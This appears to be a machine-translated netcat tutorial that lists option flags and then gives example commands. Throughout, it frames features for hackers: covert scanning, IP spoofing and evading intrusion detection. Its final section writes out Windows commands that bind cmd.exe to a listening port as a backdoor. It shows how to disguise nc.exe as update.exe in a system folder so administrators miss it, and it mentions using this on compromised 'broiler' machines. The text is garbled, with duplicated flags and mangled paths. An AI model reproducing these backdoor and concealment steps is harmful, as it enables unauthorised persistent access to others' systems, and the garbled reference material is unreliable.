Introduction to the use of netcat

The entire NC is called netcat, and it can establish and accept TCP and User Datagram Protocol (UDP) connections, Netcat can read and write data on those connections until the connection is closed. It can interact with the application-tier network application or service by hand or script. Technically speaking, Netcat does not produce UDP connections because UDP is a connectionless protocol. Netcat no graphical interface, very rough, very primitive.

　　The command line for NC

The basic command-line form of NC is the NC [options] host ports, where host is the hostname or IP address to scan, ports is either a separate port, a range of ports (specified in M-n), or a series of single ports separated by spaces.

-D is only useful for Windows operating systems, which enables netcat to work in stealth mode, leaving the environment running at the MS-dos command prompt, so that the NC does not need to keep open the command window to run in listening mode. It can also help hackers to hide listening netcat instances well without being discovered by the system administrator.

-E If Netcat uses the Gaping_security_hole option to compile, the netcat will execute whenever someone establishes a connection on any port that is listening in the net background, and the netcat of the client will be piped i/ O is transferred to another netcat instance that is listening elsewhere. Using this option is dangerous, unless you have a good understanding of NC, at least you know what you are doing. This is a quick and easy way to build a backdoor shell in the system.

-I delay interval, which represents the NC wait time between two times of data sending. For example, when a file is piped to NC, the number of seconds the NC waits before transferring the next line of input. The number of seconds that NC waits before switching to the next port when using NC to operate between multiple ports on a single host. This allows hackers to be more covert when transmitting data or attacking a service, and can also help your port scan not be discovered by intrusion detection systems and system administrators.

-G this option is deceptive. NC supports loose source routing (loosely-routed). You can specify up to 8-G options on the command line to force NC traffic through a specific IP address, which, when you set up a spoofed source IP address for traffic, can use this method to reach a filter through the firewall or allow access to the host list, hoping to receive a response from the host.

-G This option lets the user specify an address in the routing list specified by the-G option as the current next. Because the IP address is 4 byte (IPV4), this parameter is always a multiple of 4 bytes; For example, 4 represents the first IP address in the routing table, 8 represents the second IP address, and so on. This makes the message appear to be quite useful in forging part of the source routing table. This feature helps to block your location while spoofing and source routing, but does not necessarily receive response messages, as response messages are routed back through spoofed IP addresses.

-l This option toggles the monitoring mode of the NC. This option must be used with the-p option to tell the NC to bind a specified TCP port and wait for incoming connections. If you switch to the-u option, you should use the UDP port instead of the TCP port.

-l This option is useful in the Windows version, and when a connection is closed, the same command-line option is used to restart the listener mode, even if the initial connection has ended, and the NC can receive a new connection without user intervention. As with-l, it must be used in conjunction with-P.

-n This option tells us that NC does not do any host name lookup work.

-0 performs a hexadecimal dump (hex dump) on the data and stores it in Hexfile. Command Nc-o Hexfile will record data for two-way traffic, and at the beginning of each line there will be a "<" or ">" to indicate whether to enter data or out of office data separately. You can use the Nc-ohexfile command if you want to get only a hexadecimal dump of incoming data.

-P lets the user specify the local port number that an NC should use. This parameter is required when listening mode is used through the-l or-l options. If you do not specify this parameter for an out-of-office connection, as with most other TCP or UDP client programs, NC uses any port that the system assigns to him.

-r This parameter enables NC to randomly select local and remote ports. This option is useful when using NC to obtain information on a large range of ports in the system, and the order in which the mixed source and destination ports do not look like port scans. When this option is used in conjunction with the-I option and a large enough interval, the probability of success in the unnoticed port scan can be greatly improved.

-s Specifies the IP address used by the NC to establish a connection, which allows hackers to do some work that allows hackers to hide their IP addresses or impersonate other people's IP addresses, but to get any information that is routed to the addresses they deceive, you need to use the-G source routing option. Second, when in listening mode, most of the time you can "bind" to a service that is already listening, and all TCP and UDP services are bound to a port.

-T if you compile with the Telnet option, the NC can negotiate telnet with the Telnet server, although its response is meaningless, but you can see the information connected to port 23 through that state.

-u NC uses UDP instead of TCP and works in both client and listener mode.

-V Control what the NC is going to do, such as using NC-V, then NC will spit out only the data it receives, and a single-V can know if there is a problem with the address it is connected to or bound to. The 2nd-V allows NC to let you know how much data the connection sends and receives in total at the end of a connection.

-W controls the time to wait before NC discards on a connection. It also tells NC how long it should wait to close the connection and exit after receiving an EOF (End-of-file) on the standard input. This option is useful if you send commands to a remote server via NC and expect a large amount of data to be returned (for example, sending an HTTP command to a Web server to download a large file).

The specific use of NC

C:nc.exe-l-P 4455-d-e cmd.exe can well hide a netcat back door.

C:nc.exe-p 4455-d-l-e cmd.exe This command allows hackers to return to the system using NETCAT until the system administrator sees Nc.exe running in Task Manager, and finds this back door, and we can make it more covert,

C:move Nc.exe C:windowssystem32driversupdate.exe

C:windowssysteme32driversupdate.exe-p 4455-d-l-e Cmd.exe

The system administrator may have attached privileges to harmless programs such as Update.exe, and hackers can also hide the command line.

C:windowssystme32driversupdate.exe

CMD line:-l-p 4455-d-l-e cmd.exe

C:>

Nc-l-P 80 listens for 80 ports

Nc-l-P->c:log.dat listens to port 80 and logs information to Log.dat

Nc-v-l-p 80 listens on 80 ports and displays port information

Nc-vv-l-P 80 listens for 80 ports, displaying more detailed port information

Nc-l-P 80-t-e cmd.exe listens for local 80-port inbound information while redirecting Cmd.exe to 80-port, and when someone connects, let Cmd.exe answer in telnet form. Of course this is best used on the control of the broiler.

Nc-v IP Port scans a port on an IP

Nc-v-Z IP port-port scan an IP port to a port

Nc-v-z-u IP port-port scan a UDP port on an IP to a UDP port